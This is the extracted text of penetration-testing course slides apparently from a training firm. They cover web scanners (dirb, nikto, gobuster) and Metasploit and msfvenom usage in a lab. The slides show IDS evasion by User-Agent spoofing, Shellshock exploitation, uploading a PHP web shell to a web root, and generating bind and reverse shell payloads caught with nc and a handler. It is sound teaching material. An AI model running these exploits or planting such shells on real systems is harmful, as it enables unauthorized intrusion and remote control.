option • dirb http://10.XX.32.5/ -r -a 'Mozilla/5.0 (Linux; Android 6.0.1; E6653 Build/32.2.A.0.253) Chrome/52.0.2743.98' www.cybexer.com 169 DIRB - usage In some environments, access to web site might be only through a proxy server. Option '-p' followed by proxy server's IP address and port number, will send all requests through that proxy. • dirb http://10.XX.32.5/ -r -p www.cybexer.com 170 DIRB - usage If proxy server allows to access it only with username and the password, add '-P' option followed by proxy server credentials • dirb http://10.XX.32.5/ -r -p -P proxy_user:proxy_pass www.cybexer.com 171 NIKTO NIKTO NIKTO - web server vulnerability detector. Advanced scanner to identify different weaknesses in web server: • Web server and software misconfigurations • Default files and programs • Insecure files and programs • Outdated servers and programs www.cybexer.com 173 NIKTO - usage For basic scanning of web server, you have to supply its IP address of hostname and port • nikto -h 10.XX.32.5 -p 80 www.cybexer.com 174 NIKTO - usage You can specify target site, by specifying it in URL notation • nikto -h http://10.XX.32.5/ www.cybexer.com 175 NIKTO - usage For scanning HTTPS web server, you have to supply its IP address of hostname, port and use '-ssl' option • nikto -h 10.XX.32.4 -p 443 -ssl www.cybexer.com 176 NIKTO - usage To scan several ports, write them comma-separated after '-p' option. • nikto -h 10.XX.32.5 -p 80,8080,8081 www.cybexer.com 177 NIKTO - usage By default, 'nikto' uses User-Agent specified in the configuration file '/etc/nikto.conf' • grep -A 5 -B5 USERAGENT /etc/nikto.conf www.cybexer.com 178 NIKTO - usage Some IDS systems may block access to the sites with default settings (to minimize hacks by script-kiddies). 'nikto' allows to change its User-Agent by setting 'useragent' option followed by custom name • nikto -h http://10.XX.32.5/ -useragent "IOS 5.0, iPad 2022 generation" www.cybexer.com 179 GOBUSTER GOBUSTER - installation Kali Linux has 'gobuster' software in its repository. To install it, run following command in your terminal • apt-get install gobuster www.cybexer.com 181 GOBUSTER - usage To scan target web server, you have to specify URL for hostname and path to the dictionary file • gobuster dir -u http://10.XX.32.5/ -w /usr/share/dirbuster/wordlists/directory-list-2.3small.txt www.cybexer.com 182 GOBUSTER - usage If you need to filter certain HTTP response codes, use 's' options followed by code number (can be comaseparated) • gobuster dir -u http://10.XX.32.5/ -w /usr/share/dirbuster/wordlists/directory-list-2.3small.txt -s 200,401,403 www.cybexer.com 183 GOBUSTER - usage Similar to 'nikto', 'gobuster' uses its own User-Agent string 'gobuster/3.1.0'. To change it, use '-a' option followed by custom User-Agent string • gobuster dir -u http://10.XX.32.5/ -w /usr/share/dirbuster/wordlists/directory-list-2.3small.txt -a "Firefox 3.0" www.cybexer.com 184 GOBUSTER - usage In addition to web server scanning, 'gobuster' can run DNS enumeration. To scan for DNS subdomains, you need to supply domain name and path to dictionary file • gobuster dns -d cnn.com -w /usr/share/dnsenum/dns.txt www.cybexer.com 185 Metasploit Metasploit - intro Metasploit is extremely robust and flexible penetration testing framework and has tons of tools to perform various simple and complex tasks. www.cybexer.com 187 Metasploit - intro Metasploit has various components which are located in different categories www.cybexer.com 188 Metasploit - intro Auxiliaries - piece of code specifically written to perform a task. Some examples of auxiliaries: auxiliary/admin/http/tomcat_administration - scans a range of IP addresses and locates the Tomcat Server administration panel and version auxiliary/scanner/mysql/mysql_login - brute-force login tool for MySQL servers auxiliary/scanner/http/open_proxy - scan for open HTTP proxies www.cybexer.com 189 Metasploit - intro Exploits - actual code that will execute on the target system to take advantage of vulnerability. Some examples of exploits: windows/smb/ms17_010_eternalblue - ETERNALBLUE exploit unix/webapp/drupal_drupalgeddon2 - exploit for Drupal CMS www.cybexer.com 190 Metasploit - intro Payloads - is the action that needs to be performed after the execution of an exploit. Some examples of payloads: payload/generic/shell_reverse_tcp - generic reverse TCP command shell payload/php/reverse_php - reverse TCP PHP command shell www.cybexer.com 191 Metasploit - intro Encoders - various techniques and algorithms to obfuscate the payload in a way it does not get detected by antivirus software. Some examples of encoders: encoder/cmd/powershell_base64 - Powershell Base64 command encoder encoder/cmd/perl - Perl command encoder www.cybexer.com 192 Metasploit - intro POST (post-exploitation activities) - further infiltration modules, which are used after successful exploitation. Some examples of encoders: post/linux/gather/enum_users_history - gather Linux user history post/windows/manage/install_ssh - install OpenSSH on Winidows www.cybexer.com 193 Metasploit - usage Since Metasploit relies on Postgres database, before first run, Metasploit must be configured for database • msfdb init www.cybexer.com 194 Metasploit - usage If Metasploit already configured, then initialization script will inform that • msfdb init www.cybexer.com 195 Metasploit - usage Let's start Metasploit • msfconsole www.cybexer.com 196 Metasploit - usage It is important to keep Metasploit up-to-date. Check the version in MSF console • version www.cybexer.com 197 Metasploit - usage Check the database connectivity in MSF console • db_status If database is not started, 'db_status' command will show following output To start Postgres SQL database, run following command in Linux terminal • service postgresql start www.cybexer.com 198 Metasploit - usage To list content of each category • show encoders www.cybexer.com 199 Metasploit - usage Search for specific exploit/encoder/auxiliary etc. • search ftp www.cybexer.com 200 Metasploit - usage To get more precise search results, use better search query • search windows printer www.cybexer.com 201 Metasploit - usage Metasploit is very powerful tool for various attack phases information gathering, scanning, exploitation and postexploitation. Information gathering is the first and one of the most, if not the most, important activities in penetration testing. This step is carried out in order to find out as much information about the target machine as possible. The more information we have, the better our chances will be for exploiting the target. www.cybexer.com 202 Metasploit - usage There are two types of techniques used in information gathering Passive information gathering - is used to gain information about the target, without having any physical connectivity or access to it. Active information gathering - logical connection is set up with the target in order to gain information. www.cybexer.com 203 Metasploit - usage Let's do our first information gathering task. Since DNS is one of most important protocols in internet, we will do DNS record scanning and enumeration. DNS enumeration is a passive information gathering. www.cybexer.com 204 Metasploit - usage To run 'auxiliary' module in MSF console, we use the 'use' command followed by the module name. In MSF console switch to auxiliary module 'enum_dns' • use auxiliary/gather/enum_dns www.cybexer.com 205 Metasploit - usage To display various information about the module, use 'info' command • info www.cybexer.com 206 Metasploit - usage To show only module specific options, use following command in MSF console • show options www.cybexer.com 207 Metasploit - usage Module options has following columns: Name - name of variable Current Setting - value of variable Required - is variable required or not. If required variable is not set and module executed, then error will be shown Description - description of variable www.cybexer.com 208 Metasploit - usage We can see, that 'DOMAIN' variable is required, but set empty. Let's set some domain name to that variable • set DOMAIN zonetransfer.me Now if we run 'show options' again, we will see correct DOMAIN variable • show options www.cybexer.com 209 Metasploit - usage Depends on environment and security rules, you might have to set custom DNS server. • set NS www.cybexer.com 210 Metasploit - usage Now we can run our DNS enumeration against 'zonetransfer.me' domain. In MSF console type 'run' and hit 'Enter' • run www.cybexer.com 211 Metasploit - usage Now, let's examine results of DNS enumeration of 'zonetransfer.me' domain Note. Instead of 'run' command you can use 'exploit', it is an alias, but looks cooler :) www.cybexer.com 212 Metasploit - usage Next is active information gathering with Metasploit. MSF has several port scanner modules. Let's see what port scanning modules MSF has • search portscan www.cybexer.com 213 Metasploit - usage We start with simple SYN port scanning • use auxiliary/scanner/portscan/syn www.cybexer.com 214 Metasploit - usage Let's see what options are required for port scanning. Type following command MSF console • show options www.cybexer.com 215 Metasploit - usage As we can see, the only required option for port scanning which is empty is 'RHOSTS'. RHOSTS stands for remote hosts. RHOSTS can be single IP address, range of IP addresses, a hostname or CIDR identifier • set RHOSTS 10.XX.32.5 To make port scanning run a bit faster, let's lower the port range to 100 ports • set PORTS 1-100 www.cybexer.com 216 Metasploit - usage After target is set and port range adjusted, we can start scanning with 'run' command • run www.cybexer.com 217 Metasploit - usage Auxiliary port scanning modules 'scanner/portscan' use MSF built-in functions. They are not very efficient and powerful comparing to 'nmap'. MSF allows to scan targets using native 'nmap' with all its rich functionality. Syntax for running 'nmap' from Metasploit is exactly the same as you would run 'nmap' from Linux command line. www.cybexer.com 218 Metasploit - usage Exploiting targets is done in this way - select exploit you want to use - set required options - run exploit against the target www.cybexer.com 219 Metasploit - usage Search Metasploit database for required exploit. In our case, we need to search for 'shellshock'. In 'msfconsole' prompt run following command • search shellshock www.cybexer.com 220 Metasploit - usage Since we do not know that target is vulnerable to 'shellshock' exploit, we have to test it. Let's select that exploit • use exploit/multi/http/apache_mod_cgi_bash_env_exe c www.cybexer.com 221 Metasploit - usage Since each exploit can have several required options, lets check them • show options www.cybexer.com 222 Metasploit - usage From list of options, we can see that options 'RHOSTS' and 'TARGETURI' are required, but not set. Let's set those options • set rhosts 10.XX.32.3 • set targeturi /cgi-bin/test.sh www.cybexer.com 223 Metasploit - usage It's advised to verify options again before running the exploit against the target • show options www.cybexer.com 224 Metasploit - usage Before actual exploitation, you can check if target is vulnerable to selected exploit • check www.cybexer.com 225 Metasploit - usage After all options are set and verified, you can run the exploit • exploit -j www.cybexer.com 226 Metasploit - usage To list active/established sessions, type in following command • sessions -l www.cybexer.com 227 Metasploit - usage To start interacting with active session use following command (be sure to pick correct session number) • sessions -i 1 www.cybexer.com 228 Metasploit - usage To display 'meterpreter' help commands type following • help www.cybexer.com 229 Metasploit - usage In active 'meterpreter' session you can run simple systems commands cat cp mkdir mv rm etc. www.cybexer.com 230 Metasploit - usage Since we already know, that target machine is running Linux operating system, lets switch from 'meterpreter' shell to Linux command shell • shell www.cybexer.com 231 Metasploit - usage To exit remote shell type 'exit' to quit it • exit www.cybexer.com 232 Metasploit - usage Once you have entered 'meterpreter' session, you can upload new exploits/backdoors/files to remote machine. Open new Kali Linux terminal and type following command • echo '<?php system($_GET[c]);?>' > /tmp/file.php www.cybexer.com 233 Metasploit - usage In active 'meterpreter' sessions upload new file to specified remote location • upload /tmp/file.php /var/www/html/file.php Now access new file from your browser and add '?c=id' to parameter www.cybexer.com 234 Metasploit - usage In 'meterpreter' prompt type 'exit' to quit it. This command will shutdown active session. www.cybexer.com 235 Metasploit - usage To exit meterpreter shell, but keep session running, type following command: • bg www.cybexer.com 236 Metasploit - usage We also know, that remote target might have vulnerable services. Try to exploit them! www.cybexer.com 237 Msfvenom MSFvenom Msfvenom is a standalone payload generator. Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework making it as go to tool for generating and encoding payload(s) for different uses. www.cybexer.com 239 MSFvenom In Kali we can list all msfvenom functionality by simply running following command • msfvenom www.cybexer.com 240 MSFvenom Supported platform list: • • • • • • • • • • • • Cisco OSX Solaris BSD OpenBSD hardware Firefox BSDi NetBSD NodeJS FreeBSD Python www.cybexer.com • • • • • • • • • • • • • • AIX JavaScript HPUX PHP Irix Unix Linux Ruby Java Android Netware Windows mainframe multi 241 MSFvenom Msfvenom has different modules for specific actions. To list all available payloads, type following command in your Kali terminal: • msfvenom -l payloads www.cybexer.com 242 MSFvenom Listing other modules • msfvenom -l encoders • msfvenom -l archs • msfvenom -l platforms • msfvenom -l encrypt www.cybexer.com 243 MSFvenom Once specific payload is chosen, you can list its options • msfvenom -p php/meterpreter/bind_tcp --listoptions www.cybexer.com 244 MSFvenom Before generating desired payload, it's important to pay attention to required options www.cybexer.com 245 MSFvenom For customized payload generation, you might want to adjust advanced options www.cybexer.com 246 MSFvenom Before generating your first payload, you must know following • type of payload Will the payload be executed on Linux or Windows operating system? What architecture is used on target machine? Will payload be .exe, ELF, PHP, Java or PowerShell? To what IP address and port payload will connect? www.cybexer.com 247 MSFvenom Let's generate our first payload. Payload will be executed on Linux operating system. Payload will be an executable file (ELF). Payload will be running on 64-bit system. Listening IP address will be - Listening port will be - 4567 www.cybexer.com 248 MSFvenom Let's check what payload options must be set • msfvenom -p generic/shell_bind_tcp --listoptions www.cybexer.com 249 MSFvenom To generate the payload, type following command in your Kali terminal • msfvenom -p generic/shell_bind_tcp LPORT=4567 -a x64 -f elf --platform Linux -o /tmp/shell01 www.cybexer.com 250 MSFvenom Set executable bit for the file • chmod a+x /tmp/shell01 Check generated payload • ls -la /tmp/shell01 Check file type • file /tmp/shell01 www.cybexer.com 251 MSFvenom Execute the shellcode • /tmp/shell01 You will not see anything after execution. www.cybexer.com 252 MSFvenom Open new Kali terminal window and type following command • nc localhost 4567 You will not see any prompt or output. Just type any Linux command www.cybexer.com 253 MSFvenom Now we generate new, reverse shell • msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=5678 -f elf -o /tmp/shell02 www.cybexer.com 254 MSFvenom Set executable bit for the file • chmod a+x /tmp/shell02 Check generated payload • ls -la /tmp/shell02 Check file type • file /tmp/shell02 www.cybexer.com 255 MSFvenom Since we generated the reverse shell, once the shell is executed, it will connect to listening IP address and port specified with LHOST and LPORT options. In new Kali terminal window type following command • nc -lvp 5678 www.cybexer.com 256 MSFvenom Now we can execute our second shell. In Kali terminal window type following (keep nc running in another terminal window) • /tmp/shell02 If reverse connection was established, you should see following text in you "nc" terminal window www.cybexer.com 257 MSFvenom Now you can run Linux commands www.cybexer.com 258 MSFvenom Meterpreter shell The Meterpreter (short for meta-interpreter) shell, a special type of shell, is the bread and butter of Metasploit. It can be added as a payload that is either a bind shell or reverse shell. The Meterpreter is one of the advanced payloads available with the MSF, but you should not look at it as just a payload. Rather one should view it as an exploit platform that is executed on the remote system. It has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system. www.cybexer.com 259 MSFvenom Let's generate meterpreter reverse shell. First, we have to check what options must be set before shellcode generation • msfvenom -p linux/x64/meterpreter/reverse_tcp --list-options www.cybexer.com 260 MSFvenom Type following command in your Kali terminal • msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=6789 -f elf -o /tmp/shell03 www.cybexer.com 261 MSFvenom Set executable bit for the file • chmod a+x /tmp/shell03 Check generated payload • ls -la /tmp/shell03 Check file type • file /tmp/shell03 www.cybexer.com 262 MSFvenom Next step is to run a Metasploit console with a handler. Type following command in Kali terminal • msfconsole www.cybexer.com 263 MSFvenom Now let's configure a handler. In Metasploit type following commands • use exploit/multi/handler www.cybexer.com 264 MSFvenom Before running stager, we have to see what options must be configured • show options www.cybexer.com 265 MSFvenom Now we have to set option identical to our shellcode options - port and payload • set payload linux/x64/meterpreter/reverse_tcp • set LHOST • set LPORT 6789 www.cybexer.com 266 MSFvenom Before executing the handler, it is wise to recheck stager's settings • show options www.cybexer.com 267 MSFvenom Once everything is correct, we can execute the handler. Type following command in Metasploit • run -j www.cybexer.com 268 MSFvenom Final step is to launch shellcode in Kali terminal • /tmp/shell03 If shellcode was able to connect to handler, then following message will appear in Metasploit window www.cybexer.com 269 MSFvenom Let's see available sessions in Metasploit. Type following command • sessions -l www.cybexer.com 270 MSFvenom To start interacting with available session, type following command (be sure to use correct session ID number) • sessions -i 1 www.cybexer.com 271 MSFvenom Meterpreter allows to run built-in system commands or run native shell of the remote system. To see full list of available options, type following command in Metasploit • help www.cybexer.com 272